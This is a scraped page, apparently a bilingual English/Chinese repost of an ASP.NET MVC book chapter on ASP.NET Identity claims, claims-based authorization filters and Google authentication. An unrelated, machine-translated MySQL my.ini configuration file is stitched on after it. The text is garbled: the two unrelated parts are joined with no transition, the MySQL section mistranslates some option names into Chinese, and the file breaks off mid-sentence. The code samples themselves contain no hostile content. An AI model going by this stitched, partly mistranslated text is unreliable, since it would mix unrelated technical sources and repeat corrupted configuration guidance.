using System.Security.Claims;

namespace Users.Infrastructure {

    public static class IdentityHelpers {

        public static MvcHtmlString GetUserName(this HtmlHelper html, string id) {
            AppUserManager mgr
                = HttpContext.Current.GetOwinContext().GetUserManager<AppUserManager>();
            return new MvcHtmlString(mgr.FindByIdAsync(id).Result.UserName);
        }

        public static MvcHtmlString ClaimType(this HtmlHelper html, string claimType) {
            FieldInfo[] fields = typeof(ClaimTypes).GetFields();
            foreach (FieldInfo field in fields) {
                if (field.GetValue(null).ToString() == claimType) {
                    return new MvcHtmlString(field.Name);
                }
            }
            return new MvcHtmlString(string.Format("{0}",
                claimType.Split('/', '.').Last()));
        }
    }
}

Note: The helper method isn't at all efficient, because it reflects on the fields of the ClaimTypes class for each claim that is displayed, but it is sufficient for my purposes in this chapter. You won't often need to display the claim type in real applications.

To see why I have created a controller that uses claims without really explaining what they are, start the application, authenticate as the user Alice (with the password MySecret), and request the /Claims/Index URL. Figure 15-5 shows the content that is generated.

Figure 15-5. The output from the Index action of the Claims controller

It can be hard to make out the detail in the figure, so I have reproduced the content in Table 15-7.

Table 15-7. The Data Shown in Figure 15-5

Subject | Issuer | Type | Value
Alice | LOCAL AUTHORITY | SecurityStamp | Unique ID
Alice | LOCAL AUTHORITY | IdentityProvider | ASP.NET Identity
Alice | LOCAL AUTHORITY | Role | Employees
Alice | LOCAL AUTHORITY | Role | Users
Alice | LOCAL AUTHORITY | Name | Alice
Alice | LOCAL AUTHORITY | NameIdentifier | Alice's user ID

The table shows the most important aspect of claims: I have already been using them when I implemented the traditional authentication and authorization features in Chapter 14. You can see that some of the claims relate to user identity (the Name claim is Alice, and the NameIdentifier claim is Alice's unique user ID in my ASP.NET Identity database). Other claims show membership of roles; there are two Role claims in the table, reflecting the fact that Alice is assigned to both the Users and Employees roles.
There is also a claim about how Alice was authenticated: The IdentityProvider claim is set to ASP.NET Identity.

The difference when this information is expressed as a set of claims is that you can determine where the data came from. The Issuer property for all the claims shown in the table is set to LOCAL AUTHORITY, which indicates that the user's identity was established by the application itself.

So, now that you have seen some example claims, I can more easily describe what a claim is. A claim is any piece of information about a user that is available to the application, including the user's identity and role memberships. And, as you have seen, the information I defined about my users in earlier chapters is automatically made available as claims by ASP.NET Identity.

15.3.2 Creating and Using Claims

Claims are interesting for two reasons. The first reason is that an application can obtain claims from multiple sources, rather than just relying on a local database for information about the user. You will see a real example of this when I show you how to authenticate users through a third-party system in the "Using Third-Party Authentication" section, but for the moment I am going to add a class to the example project that simulates a system that provides claims information. Listing 15-15 shows the contents of the LocationClaimsProvider.cs file that I added to the Infrastructure folder.

Listing 15-15. The Contents of the LocationClaimsProvider.cs File

using System.Collections.Generic;
using System.Security.Claims;

namespace Users.Infrastructure {

    public static class LocationClaimsProvider {

        public static IEnumerable<Claim> GetClaims(ClaimsIdentity user) {
            List<Claim> claims = new List<Claim>();
            if (user.Name.ToLower() == "alice") {
                claims.Add(CreateClaim(ClaimTypes.PostalCode, "DC 20500"));
                claims.Add(CreateClaim(ClaimTypes.StateOrProvince, "DC"));
            } else {
                claims.Add(CreateClaim(ClaimTypes.PostalCode, "NY 10036"));
                claims.Add(CreateClaim(ClaimTypes.StateOrProvince, "NY"));
            }
            return claims;
        }

        private static Claim CreateClaim(string type, string value) {
            return new Claim(type, value, ClaimValueTypes.String, "RemoteClaims");
        }
    }
}

The GetClaims method takes a ClaimsIdentity argument and uses the Name property to create claims about the user's ZIP code and state. This class allows me to simulate a system such as a central HR database, which would be the authoritative source of location information about staff, for example.

Claims are associated with the user's identity during the authentication process, and Listing 15-16 shows the changes I made to the Login action method of the Account controller to call the LocationClaimsProvider class.
Listing 15-16. Associating Claims with a User in the AccountController.cs File

...
[HttpPost]
[AllowAnonymous]
[ValidateAntiForgeryToken]
public async Task<ActionResult> Login(LoginModel details, string returnUrl) {
    if (ModelState.IsValid) {
        AppUser user = await UserManager.FindAsync(details.Name, details.Password);
        if (user == null) {
            ModelState.AddModelError("", "Invalid name or password.");
        } else {
            ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,
                DefaultAuthenticationTypes.ApplicationCookie);
            ident.AddClaims(LocationClaimsProvider.GetClaims(ident));
            AuthManager.SignOut();
            AuthManager.SignIn(new AuthenticationProperties {
                IsPersistent = false
            }, ident);
            return Redirect(returnUrl);
        }
    }
    ViewBag.returnUrl = returnUrl;
    return View(details);
}
...

You can see the effect of the location claims by starting the application, authenticating as a user, and requesting the /Claims/Index URL. Figure 15-6 shows the claims for Alice. You may have to sign out and sign back in again to see the change.

Figure 15-6. Defining additional claims for users

Obtaining claims from multiple locations means that the application doesn't have to duplicate data held elsewhere and allows integration of data from external parties. The Claim.Issuer property tells you where a claim originated, which helps you judge how accurate the data is likely to be and how much weight you should give it in your application. Location data obtained from a central HR database is likely to be more accurate and trustworthy than data obtained from an external mailing-list provider, for example.

1. Applying Claims

The second reason that claims are interesting is that you can use them to manage user access to your application more flexibly than with standard roles. The problem with roles is that they are static, and once a user has been assigned to a role, the user remains a member until explicitly removed. This is, for example, how long-term employees of big corporations end up with incredible access to internal systems: They are assigned the roles they require for each new job they get, but the old roles are rarely removed. (The unexpectedly broad systems access sometimes becomes apparent during the investigation into how someone was able to ship the contents of the warehouse to their home address; a true story.)

Claims can be used to authorize users based directly on the information that is known about them, which ensures that the authorization changes when the data changes. The simplest way to do this is to generate Role claims based on user data, which controllers then use to restrict access to action methods. Listing 15-17 shows the contents of the ClaimsRoles.cs file that I added to the Infrastructure folder.
Listing 15-17. The Contents of the ClaimsRoles.cs File

using System.Collections.Generic;
using System.Security.Claims;

namespace Users.Infrastructure {

    public class ClaimsRoles {

        public static IEnumerable<Claim> CreateRolesFromClaims(ClaimsIdentity user) {
            List<Claim> claims = new List<Claim>();
            if (user.HasClaim(x => x.Type == ClaimTypes.StateOrProvince
                    && x.Issuer == "RemoteClaims" && x.Value == "DC")
                && user.HasClaim(x => x.Type == ClaimTypes.Role
                    && x.Value == "Employees")) {
                claims.Add(new Claim(ClaimTypes.Role, "DCStaff"));
            }
            return claims;
        }
    }
}

The gnarly looking CreateRolesFromClaims method uses lambda expressions to determine whether the user has a StateOrProvince claim from the RemoteClaims issuer with a value of DC and a Role claim with a value of Employees. If the user has both claims, then a Role claim is returned for the DCStaff role. Listing 15-18 shows how I call the CreateRolesFromClaims method from the Login action in the Account controller.

Listing 15-18. Generating Roles Based on Claims in the AccountController.cs File

...
[HttpPost]
[AllowAnonymous]
[ValidateAntiForgeryToken]
public async Task<ActionResult> Login(LoginModel details, string returnUrl) {
    if (ModelState.IsValid) {
        AppUser user = await UserManager.FindAsync(details.Name, details.Password);
        if (user == null) {
            ModelState.AddModelError("", "Invalid name or password.");
        } else {
            ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,
                DefaultAuthenticationTypes.ApplicationCookie);
            ident.AddClaims(LocationClaimsProvider.GetClaims(ident));
            ident.AddClaims(ClaimsRoles.CreateRolesFromClaims(ident));
            AuthManager.SignOut();
            AuthManager.SignIn(new AuthenticationProperties {
                IsPersistent = false
            }, ident);
            return Redirect(returnUrl);
        }
    }
    ViewBag.returnUrl = returnUrl;
    return View(details);
}
...

I can then restrict access to an action method based on membership of the DCStaff role. Listing 15-19 shows a new action method I added to the Claims controller, to which I have applied the Authorize attribute.

Listing 15-19. Adding a New Action Method to the ClaimsController.cs File

using System.Security.Claims;
using System.Web;
using System.Web.Mvc;

namespace Users.Controllers {

    public class ClaimsController : Controller {

        [Authorize]
        public ActionResult Index() {
            ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;
            if (ident == null) {
                return View("Error", new string[] { "No claims available" });
            } else {
                return View(ident.Claims);
            }
        }

        [Authorize(Roles = "DCStaff")]
        public string OtherAction() {
            return "This is the protected action";
        }
    }
}

Users will be able to access OtherAction only if their claims grant them membership of the DCStaff role. Membership of this role is generated dynamically, so a change to the user's employment status or location information will change their authorization level.
15.3.3 Authorizing Access Using Claims

The previous example is an effective demonstration of how claims can be used to keep authorizations fresh and accurate, but it is a little indirect, because I generate roles based on claims data and then enforce my authorization policy based on membership of that role. A more direct and flexible approach is to enforce authorization directly by creating a custom authorization filter attribute. Listing 15-20 shows the contents of the ClaimsAccessAttribute.cs file, which I added to the Infrastructure folder and used to create such a filter.

Listing 15-20. The Contents of the ClaimsAccessAttribute.cs File

using System.Security.Claims;
using System.Web;
using System.Web.Mvc;

namespace Users.Infrastructure {

    public class ClaimsAccessAttribute : AuthorizeAttribute {

        public string Issuer { get; set; }
        public string ClaimType { get; set; }
        public string Value { get; set; }

        protected override bool AuthorizeCore(HttpContextBase context) {
            return context.User.Identity.IsAuthenticated
                && context.User.Identity is ClaimsIdentity
                && ((ClaimsIdentity)context.User.Identity).HasClaim(x =>
                    x.Issuer == Issuer && x.Type == ClaimType && x.Value == Value);
        }
    }
}

The attribute I have defined is derived from the AuthorizeAttribute class, which makes it easy to create custom authorization policies in MVC framework applications by overriding the AuthorizeCore method. My implementation grants access if the user is authenticated, the IIdentity implementation is an instance of ClaimsIdentity, and the user has a claim with the issuer, type, and value matching the class properties. Listing 15-21 shows how I applied the attribute to the Claims controller to authorize access to the OtherAction method based on one of the location claims created by the LocationClaimsProvider class.

Listing 15-21. Performing Authorization on Claims in the ClaimsController.cs File
在ClaimsController.cs文件中执行基于声明的授权 using System.Security.Claims;using System.Web;using System.Web.Mvc;using Users.Infrastructure;namespace Users.Controllers {public class ClaimsController : Controller {[Authorize]public ActionResult Index() {ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;if (ident == null) {return View("Error", new string[] { "No claims available" });} else {return View(ident.Claims);} } [ClaimsAccess(Issuer="RemoteClaims", ClaimType=ClaimTypes.PostalCode,Value="DC 20500")]public string OtherAction() {return "This is the protected action";} }} My authorization filter ensures that only users whose location claims specify a ZIP code of DC 20500 can invoke the OtherAction method. 这个授权过滤器能够确保只有地点声明(Claim)的邮编为DC 20500的用户才能请求OtherAction方法。 15.4 Using Third-Party Authentication 15.4 使用第三方认证 One of the benefits of a claims-based system such as ASP.NET Identity is that any of the claims can come from an external system, even those that identify the user to the application. This means that other systems can authenticate users on behalf of the application, and ASP.NET Identity builds on this idea to make it simple and easy to add support for authenticating users through third parties such as Microsoft, Google, Facebook, and Twitter. 基于声明的系统,如ASP.NET Identity,的好处之一是任何声明都可以来自于外部系统,即使是将用户标识到应用程序的那些声明。这意味着其他系统可以代表应用程序来认证用户,而ASP.NET Identity就建立在这样的思想之上,使之能够简单而方便地添加第三方认证用户的支持,如微软、Google、Facebook、Twitter等。 There are some substantial benefits of using third-party authentication: Many users will already have an account, users can elect to use two-factor authentication, and you don’t have to manage user credentials in the application. In the sections that follow, I’ll show you how to set up and use third-party authentication for Google users, which Table 15-8 puts into context. 使用第三方认证有一些实际的好处:许多用户已经有了账号、用户可以选择使用双因子认证、你不必在应用程序中管理用户凭据等等。在以下小节中,我将演示如何为Google用户建立并使用第三方认证,表15-8描述了事情的情形。 Table 15-8. Putting Third-Party Authentication in Context 表15-8. 第三方认证情形 Question 问题 Answer 回答 What is it? 什么是第三方认证? Authenticating with third parties lets you take advantage of the popularity of companies such as Google and Facebook. 第三方认证使你能够利用流行公司,如Google和Facebook,的优势。 Why should I care? 为何要关心它? Users don’t like having to remember passwords for many different sites. Using a provider with large-scale adoption can make your application more appealing to users of the provider’s services. 用户不喜欢记住许多不同网站的口令。使用大范围适应的提供器可使你的应用程序更吸引有提供器服务的用户。 How is it used by the MVC framework? 如何在MVC框架中使用它? This feature isn’t used directly by the MVC framework. 这不是一个直接由MVC框架使用的特性。 Note The reason I have chosen to demonstrate Google authentication is that it is the only option that doesn’t require me to register my application with the authentication service. You can get details of the registration processes required at http://bit.ly/1cqLTrE. 提示:我选择演示Google认证的原因是,它是唯一不需要在其认证服务中注册我应用程序的公司。有关认证服务注册过程的细节,请参阅http://bit.ly/1cqLTrE。 15.4.1 Enabling Google Authentication 15.4.1 启用Google认证 ASP.NET Identity comes with built-in support for authenticating users through their Microsoft, Google, Facebook, and Twitter accounts as well more general support for any authentication service that supports OAuth. The first step is to add the NuGet package that includes the Google-specific additions for ASP.NET Identity. 
Enter the following command into the Package Manager Console: ASP.NET Identity带有通过Microsoft、Google、Facebook以及Twitter账号认证用户的内建支持,并且对于支持OAuth的认证服务具有更普遍的支持。第一个步骤是添加NuGet包,包中含有用于ASP.NET Identity的Google专用附件。请在“Package Manager Console(包管理器控制台)”中输入以下命令: Install-Package Microsoft.Owin.Security.Google -version 2.0.2 There are NuGet packages for each of the services that ASP.NET Identity supports, as described in Table 15-9. 对于ASP.NET Identity支持的每一种服务都有相应的NuGet包,如表15-9所示。 Table 15-9. The NuGet Authenticaton Packages 表15-9. NuGet认证包 Name 名称 Description 描述 Microsoft.Owin.Security.Google Authenticates users with Google accounts 用Google账号认证用户 Microsoft.Owin.Security.Facebook Authenticates users with Facebook accounts 用Facebook账号认证用户 Microsoft.Owin.Security.Twitter Authenticates users with Twitter accounts 用Twitter账号认证用户 Microsoft.Owin.Security.MicrosoftAccount Authenticates users with Microsoft accounts 用Microsoft账号认证用户 Microsoft.Owin.Security.OAuth Authenticates users against any OAuth 2.0 service 根据任一OAuth 2.0服务认证用户 Once the package is installed, I enable support for the authentication service in the OWIN startup class, which is defined in the App_Start/IdentityConfig.cs file in the example project. Listing 15-22 shows the change that I have made. 一旦安装了这个包,便可以在OWIN启动类中启用此项认证服务的支持,启动类的定义在示例项目的App_Start/IdentityConfig.cs文件中。清单15-22显示了所做的修改。 Listing 15-22. Enabling Google Authentication in the IdentityConfig.cs File 清单15-22. 在IdentityConfig.cs文件中启用Google认证 using Microsoft.AspNet.Identity;using Microsoft.Owin;using Microsoft.Owin.Security.Cookies;using Owin;using Users.Infrastructure;using Microsoft.Owin.Security.Google;namespace Users {public class IdentityConfig {public void Configuration(IAppBuilder app) {app.CreatePerOwinContext<AppIdentityDbContext>(AppIdentityDbContext.Create);app.CreatePerOwinContext<AppUserManager>(AppUserManager.Create);app.CreatePerOwinContext<AppRoleManager>(AppRoleManager.Create); app.UseCookieAuthentication(new CookieAuthenticationOptions {AuthenticationType = DefaultAuthenticationTypes.ApplicationCookie,LoginPath = new PathString("/Account/Login"),}); app.UseExternalSignInCookie(DefaultAuthenticationTypes.ExternalCookie);app.UseGoogleAuthentication();} }} Each of the packages that I listed in Table 15-9 contains an extension method that enables the corresponding service. The extension method for the Google service is called UseGoogleAuthentication, and it is called on the IAppBuilder implementation that is passed to the Configuration method. 表15-9所列的每个包都含有启用相应服务的扩展方法。用于Google服务的扩展方法名称为UseGoogleAuthentication,它通过传递给Configuration方法的IAppBuilder实现进行调用。 Next I added a button to the Views/Account/Login.cshtml file, which allows users to log in via Google. You can see the change in Listing 15-23. 下一步骤是在Views/Account/Login.cshtml文件中添加一个按钮,让用户能够通过Google进行登录。所做的修改如清单15-23所示。 Listing 15-23. Adding a Google Login Button to the Login.cshtml File 清单15-23. 
在Login.cshtml文件中添加Google登录按钮 @model Users.Models.LoginModel@{ ViewBag.Title = "Login";}<h2>Log In</h2> @Html.ValidationSummary()@using (Html.BeginForm()) {@Html.AntiForgeryToken();<input type="hidden" name="returnUrl" value="@ViewBag.returnUrl" /><div class="form-group"><label>Name</label>@Html.TextBoxFor(x => x.Name, new { @class = "form-control" })</div><div class="form-group"><label>Password</label>@Html.PasswordFor(x => x.Password, new { @class = "form-control" })</div><button class="btn btn-primary" type="submit">Log In</button>}@using (Html.BeginForm("GoogleLogin", "Account")) {<input type="hidden" name="returnUrl" value="@ViewBag.returnUrl" /><button class="btn btn-primary" type="submit">Log In via Google</button>} The new button submits a form that targets the GoogleLogin action on the Account controller. You can see this method—and the other changes I made the controller—in Listing 15-24. 新按钮递交一个表单,目标是Account控制器中的GoogleLogin动作。可从清单15-24中看到该方法,以及在控制器中所做的其他修改。 Listing 15-24. Adding Support for Google Authentication to the AccountController.cs File 清单15-24. 在AccountController.cs文件中添加Google认证支持 using System.Threading.Tasks;using System.Web.Mvc;using Users.Models;using Microsoft.Owin.Security;using System.Security.Claims;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.Owin;using Users.Infrastructure;using System.Web; namespace Users.Controllers {[Authorize]public class AccountController : Controller {[AllowAnonymous]public ActionResult Login(string returnUrl) {if (HttpContext.User.Identity.IsAuthenticated) {return View("Error", new string[] { "Access Denied" });}ViewBag.returnUrl = returnUrl;return View();}[HttpPost][AllowAnonymous][ValidateAntiForgeryToken]public async Task<ActionResult> Login(LoginModel details, string returnUrl) {if (ModelState.IsValid) {AppUser user = await UserManager.FindAsync(details.Name,details.Password);if (user == null) {ModelState.AddModelError("", "Invalid name or password.");} else {ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie); ident.AddClaims(LocationClaimsProvider.GetClaims(ident));ident.AddClaims(ClaimsRoles.CreateRolesFromClaims(ident)); AuthManager.SignOut();AuthManager.SignIn(new AuthenticationProperties {IsPersistent = false}, ident);return Redirect(returnUrl);} }ViewBag.returnUrl = returnUrl;return View(details);} [HttpPost][AllowAnonymous]public ActionResult GoogleLogin(string returnUrl) {var properties = new AuthenticationProperties {RedirectUri = Url.Action("GoogleLoginCallback",new { returnUrl = returnUrl})};HttpContext.GetOwinContext().Authentication.Challenge(properties, "Google");return new HttpUnauthorizedResult();}[AllowAnonymous]public async Task<ActionResult> GoogleLoginCallback(string returnUrl) {ExternalLoginInfo loginInfo = await AuthManager.GetExternalLoginInfoAsync();AppUser user = await UserManager.FindAsync(loginInfo.Login);if (user == null) {user = new AppUser {Email = loginInfo.Email,UserName = loginInfo.DefaultUserName,City = Cities.LONDON, Country = Countries.UK};IdentityResult result = await UserManager.CreateAsync(user);if (!result.Succeeded) {return View("Error", result.Errors);} else {result = await UserManager.AddLoginAsync(user.Id, loginInfo.Login);if (!result.Succeeded) {return View("Error", result.Errors);} }}ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(loginInfo.ExternalIdentity.Claims);AuthManager.SignIn(new AuthenticationProperties {IsPersistent = 
false }, ident);return Redirect(returnUrl ?? "/");}[Authorize]public ActionResult Logout() {AuthManager.SignOut();return RedirectToAction("Index", "Home");}private IAuthenticationManager AuthManager {get {return HttpContext.GetOwinContext().Authentication;} }private AppUserManager UserManager {get {return HttpContext.GetOwinContext().GetUserManager<AppUserManager>();} }} } The GoogleLogin method creates an instance of the AuthenticationProperties class and sets the RedirectUri property to a URL that targets the GoogleLoginCallback action in the same controller. The next part is a magic phrase that causes ASP.NET Identity to respond to an unauthorized error by redirecting the user to the Google authentication page, rather than the one defined by the application: GoogleLogin方法创建了AuthenticationProperties类的一个实例,并为RedirectUri属性设置了一个URL,其目标为同一控制器中的GoogleLoginCallback动作。下一个部分是一个神奇阶段,通过将用户重定向到Google认证页面,而不是应用程序所定义的认证页面,让ASP.NET Identity对未授权的错误进行响应: ...HttpContext.GetOwinContext().Authentication.Challenge(properties, "Google");return new HttpUnauthorizedResult();... This means that when the user clicks the Log In via Google button, their browser is redirected to the Google authentication service and then redirected back to the GoogleLoginCallback action method once they are authenticated. 这意味着,当用户通过点击Google按钮进行登录时,浏览器被重定向到Google的认证服务,一旦在那里认证之后,便被重定向回GoogleLoginCallback动作方法。 I get details of the external login by calling the GetExternalLoginInfoAsync of the IAuthenticationManager implementation, like this: 我通过调用IAuthenticationManager实现的GetExternalLoginInfoAsync方法,我获得了外部登录的细节,如下所示: ...ExternalLoginInfo loginInfo = await AuthManager.GetExternalLoginInfoAsync();... The ExternalLoginInfo class defines the properties shown in Table 15-10. ExternalLoginInfo类定义的属性如表15-10所示: Table 15-10. The Properties Defined by the ExternalLoginInfo Class 表15-10. ExternalLoginInfo类所定义的属性 Name 名称 Description 描述 DefaultUserName Returns the username 返回用户名 Email Returns the e-mail address 返回E-mail地址 ExternalIdentity Returns a ClaimsIdentity that identities the user 返回标识该用户的ClaimsIdentity Login Returns a UserLoginInfo that describes the external login 返回描述外部登录的UserLoginInfo I use the FindAsync method defined by the user manager class to locate the user based on the value of the ExternalLoginInfo.Login property, which returns an AppUser object if the user has been authenticated with the application before: 我使用了由用户管理器类所定义的FindAsync方法,以便根据ExternalLoginInfo.Login属性的值对用户进行定位,如果用户之前在应用程序中已经认证,该属性会返回一个AppUser对象: ...AppUser user = await UserManager.FindAsync(loginInfo.Login);... If the FindAsync method doesn’t return an AppUser object, then I know that this is the first time that this user has logged into the application, so I create a new AppUser object, populate it with values, and save it to the database. I also save details of how the user logged in so that I can find them next time: 如果FindAsync方法返回的不是AppUser对象,那么我便知道这是用户首次登录应用程序,于是便创建了一个新的AppUser对象,填充该对象的值,并将其保存到数据库。我还保存了用户如何登录的细节,以便下次能够找到他们: ...result = await UserManager.AddLoginAsync(user.Id, loginInfo.Login);... 
All that remains is to generate an identity the user, copy the claims provided by Google, and create an authentication cookie so that the application knows the user has been authenticated: 剩下的事情只是生成该用户的标识了,拷贝Google提供的声明(Claims),并创建一个认证Cookie,以使应用程序知道此用户已认证: ...ClaimsIdentity ident = await UserManager.CreateIdentityAsync(user,DefaultAuthenticationTypes.ApplicationCookie);ident.AddClaims(loginInfo.ExternalIdentity.Claims);AuthManager.SignIn(new AuthenticationProperties { IsPersistent = false }, ident);... 15.4.2 Testing Google Authentication 15.4.2 测试Google认证 There is one further change that I need to make before I can test Google authentication: I need to change the account verification I set up in Chapter 13 because it prevents accounts from being created with e-mail addresses that are not within the example.com domain. Listing 15-25 shows how I removed the verification from the AppUserManager class. 在测试Google认证之前还需要一处修改:需要修改第13章所建立的账号验证,因为它不允许example.com域之外的E-mail地址创建账号。清单15-25显示了如何在AppUserManager类中删除这种验证。 Listing 15-25. Disabling Account Validation in the AppUserManager.cs File 清单15-25. 在AppUserManager.cs文件中取消账号验证 using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.EntityFramework;using Microsoft.AspNet.Identity.Owin;using Microsoft.Owin;using Users.Models; namespace Users.Infrastructure {public class AppUserManager : UserManager<AppUser> {public AppUserManager(IUserStore<AppUser> store): base(store) {}public static AppUserManager Create(IdentityFactoryOptions<AppUserManager> options,IOwinContext context) {AppIdentityDbContext db = context.Get<AppIdentityDbContext>();AppUserManager manager = new AppUserManager(new UserStore<AppUser>(db)); manager.PasswordValidator = new CustomPasswordValidator {RequiredLength = 6,RequireNonLetterOrDigit = false,RequireDigit = false,RequireLowercase = true,RequireUppercase = true}; //manager.UserValidator = new CustomUserValidator(manager) {// AllowOnlyAlphanumericUserNames = true,// RequireUniqueEmail = true//};return manager;} }} Tip you can use validation for externally authenticated accounts, but I am just going to disable the feature for simplicity. 提示:也可以使用外部已认证账号的验证,但这里出于简化,取消了这一特性。 To test authentication, start the application, click the Log In via Google button, and provide the credentials for a valid Google account. When you have completed the authentication process, your browser will be redirected back to the application. If you navigate to the /Claims/Index URL, you will be able to see how claims from the Google system have been added to the user’s identity, as shown in Figure 15-7. 为了测试认证,启动应用程序,通过点击“Log In via Google(通过Google登录)”按钮,并提供有效的Google账号凭据。当你完成了认证过程时,浏览器将被重定向回应用程序。如果导航到/Claims/Index URL,便能够看到来自Google系统的声明(Claims),已被添加到用户的标识中了,如图15-7所示。 Figure 15-7. Claims from Google 图15-7. 来自Google的声明(Claims) 15.5 Summary 15.5 小结 In this chapter, I showed you some of the advanced features that ASP.NET Identity supports. I demonstrated the use of custom user properties and how to use database migrations to preserve data when you upgrade the schema to support them. I explained how claims work and how they can be used to create more flexible ways of authorizing users. I finished the chapter by showing you how to authenticate users via Google, which builds on the ideas behind the use of claims. 
本章向你演示了ASP.NET Identity所支持的一些高级特性。演示了自定义用户属性的使用,还演示了在升级数据架构时,如何使用数据库迁移保护数据。我解释了声明(Claims)的工作机制,以及如何将它们用于创建更灵活的用户授权方式。最后演示了如何通过Google进行认证,为本章作结,这是建立在使用声明(Claims)的思想基础之上的。
原文链接:https://blog.csdn.net/gz19871113/article/details/108591802
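As a quick way to exercise this chapter's matching logic in isolation — a hedged sketch of my own, not code from the book — you can build a ClaimsIdentity by hand and evaluate the same predicate that Listing 15-20's AuthorizeCore uses:

// Illustrative only: recreates the Listing 15-20 check outside of MVC.
using System;
using System.Security.Claims;

class FilterLogicDemo {
    static void Main() {
        var ident = new ClaimsIdentity(new[] {
            new Claim(ClaimTypes.PostalCode, "DC 20500",
                      ClaimValueTypes.String, "RemoteClaims")
        }, "Demo");

        // The predicate ClaimsAccessAttribute evaluates in AuthorizeCore
        bool granted = ident.HasClaim(x =>
            x.Issuer == "RemoteClaims" &&
            x.Type == ClaimTypes.PostalCode &&
            x.Value == "DC 20500");

        Console.WriteLine(granted); // True -> OtherAction would be reachable
    }
}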
2023-10-28 08:49:21
283
转载
转载文章
...x you can copy this file to /etc/my.cnf to set global options, mysql-data-dir/my.cnf to set server-specific options (@localstatedir@ for this installation) or to ~/.my.cnf to set user-specific options. 在Linux上,您可以将该文件复制到/etc/my.cnf来设置全局选项,mysql-data-dir/my.cnf来设置特定于服务器的选项(此安装的@localstatedir@),或者~/.my.cnf来设置特定于用户的选项。 On Windows you should keep this file in the installation directory of your server (e.g. C:\Program Files\MySQL\MySQL Server X.Y). To make sure the server reads the config file use the startup option "--defaults-file". 在Windows上你应该保持这个文件在服务器的安装目录(例如C:\Program Files\MySQL\MySQL服务器X.Y)。要确保服务器读取配置文件,请使用启动选项“——default -file”。 To run the server from the command line, execute this in a command line shell, e.g. mysqld --defaults-file="C:\Program Files\MySQL\MySQL Server X.Y\my.ini" 要从命令行运行服务器,请在命令行shell中执行,例如mysqld——default -file="C:\Program Files\MySQL\MySQL server X.Y\my.ini" To install the server as a Windows service manually, execute this in a command line shell, e.g. mysqld --install MySQLXY --defaults-file="C:\Program Files\MySQL\MySQL Server X.Y\my.ini" 要手动将服务器安装为Windows服务,请在命令行shell中执行此操作,例如mysqld——install MySQLXY——default -file="C:\Program Files\MySQL\MySQL server X.Y\my.ini" And then execute this in a command line shell to start the server, e.g. net start MySQLXY 然后在命令行shell中执行这个命令来启动服务器,例如net start MySQLXY Guidelines for editing this file编辑此文件的指南 ---------------------------------------------------------------------- In this file, you can use all long options that the program supports. If you want to know the options a program supports, start the program with the "--help" option. 在这个文件中,您可以使用程序支持的所有长选项。如果您想知道程序支持的选项,请使用“——help”选项启动程序。 More detailed information about the individual options can also be found in the manual. For advice on how to change settings please see https://dev.mysql.com/doc/refman/8.0/en/server-configuration-defaults.html 有关各个选项的更详细信息也可以在手册中找到。有关如何更改设置的建议,请参见https://dev.mysql.com/doc/refman/8.0/en/server-configuration-defaults.html CLIENT SECTION 客户端部分 ---------------------------------------------------------------------- The following options will be read by MySQL client applications. Note that only client applications shipped by MySQL are guaranteed to read this section. If you want your own MySQL client program to honor these values, you need to specify it as an option during the MySQL client library initialization. MySQL客户机应用程序将读取以下选项。注意,只有MySQL提供的客户端应用程序才能阅读本节。如果您希望自己的MySQL客户机程序遵守这些值,您需要在初始化MySQL客户机库时将其指定为一个选项。 [client] pipe= socket=MYSQL port=3306 [mysql] no-beep default-character-set= SERVER SECTION 服务器部分 ---------------------------------------------------------------------- The following options will be read by the MySQL Server. Make sure that you have installed the server correctly (see above) so it reads this file. MySQL服务器将读取以下选项。确保您已经正确安装了服务器(参见上面),以便它读取这个文件。 server_type=3 [mysqld] The next three options are mutually exclusive to SERVER_PORT below. 下面的三个选项对SERVER_PORT是互斥的。skip-networking enable-named-pipe 共享内存 skip-networking enable-named-pipe shared-memory shared-memory-base-name=MYSQL The Pipe the MySQL Server will use socket=MYSQL The TCP/IP Port the MySQL Server will listen on port=3306 Path to installation directory. All paths are usually resolved relative to this. 
basedir="C:/Program Files/MySQL/MySQL Server 8.0/" Path to the database root datadir=C:/ProgramData/MySQL/MySQL Server 8.0/Data The default character set that will be used when a new schema or table is created and no character set is defined 创建新模式或表时使用的默认字符集,并且没有定义字符集 character-set-server= The default authentication plugin to be used when connecting to the server 连接到服务器时使用的默认身份验证插件 default_authentication_plugin=caching_sha2_password The default storage engine that will be used when create new tables when 当创建新表时将使用的默认存储引擎 default-storage-engine=INNODB Set the SQL mode to strict 将SQL模式设置为strict sql-mode="STRICT_TRANS_TABLES,NO_ENGINE_SUBSTITUTION" General and Slow logging. 一般和缓慢的日志。 log-output=NONE general-log=0 general_log_file="DESKTOP-NF9QETB.log" slow-query-log=0 slow_query_log_file="DESKTOP-NF9QETB-slow.log" long_query_time=10 Binary Logging. 二进制日志。 log-bin Error Logging. 错误日志记录。 log-error="DESKTOP-NF9QETB.err" Server Id. server-id=1 Indicates how table and database names are stored on disk and used in MySQL. 指示表名和数据库名如何存储在磁盘上并在MySQL中使用。 Value = 0: Table and database names are stored on disk using the lettercase specified in the CREATE TABLE or CREATE DATABASE statement. Name comparisons are case sensitive. You should not set this variable to 0 if you are running MySQL on a system that has case-insensitive file names (such as Windows or macOS). Value = 0:表名和数据库名使用CREATE Table或CREATE database语句中指定的lettercase存储在磁盘上。名称比较区分大小写。如果您在一个具有不区分大小写文件名(如Windows或macOS)的系统上运行MySQL,则不应将该变量设置为0。 Value = 1: Table names are stored in lowercase on disk and name comparisons are not case-sensitive. MySQL converts all table names to lowercase on storage and lookup. This behavior also applies to database names and table aliases. 表名以小写存储在磁盘上,并且名称比较不区分大小写。MySQL在存储和查找时将所有表名转换为小写。此行为也适用于数据库名称和表别名。 Value = 3, Table and database names are stored on disk using the lettercase specified in the CREATE TABLE or CREATE DATABASE statement, but MySQL converts them to lowercase on lookup. Name comparisons are not case sensitive. This works only on file systems that are not case-sensitive! InnoDB table names and view names are stored in lowercase, as for Value = 1.表名和数据库名使用CREATE Table或CREATE 